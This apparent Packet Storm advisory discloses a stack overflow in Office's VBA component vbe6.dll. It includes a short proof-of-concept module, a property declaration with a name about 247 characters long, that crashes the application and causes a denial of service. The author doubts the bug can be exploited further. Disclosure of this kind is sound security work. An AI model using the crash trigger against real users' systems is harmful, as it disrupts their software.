Visual Basic suffers from a local stack overflow vulnerability in vbe6.dll that can lead to a denial of service condition.
4cb49535a3ef1355c4211ee7f7ec9e4cStack overflow in vbe6.dll, (used by all versions of MS Office)
The overflow occurs in Visual Basic for Application.
Creating a property with a long name ( about 247 chars) results in a stack overflow in vbe6.dll which overwrites with a null byte the first byte of the return address.
Probably impossible to exploit, but who knows? ^^ At least, there still exist stack overflows in Office apps :P
Marsu <Marsupilamipowa@hotmail.fr>
Module1.bas:
Attribute VB_Name = "Module1"
Public Property Get aaabcdefghissssssaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaasssssssssssssssssssssssssssssssssssssssssssssssssssade() As Variant
End Property
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!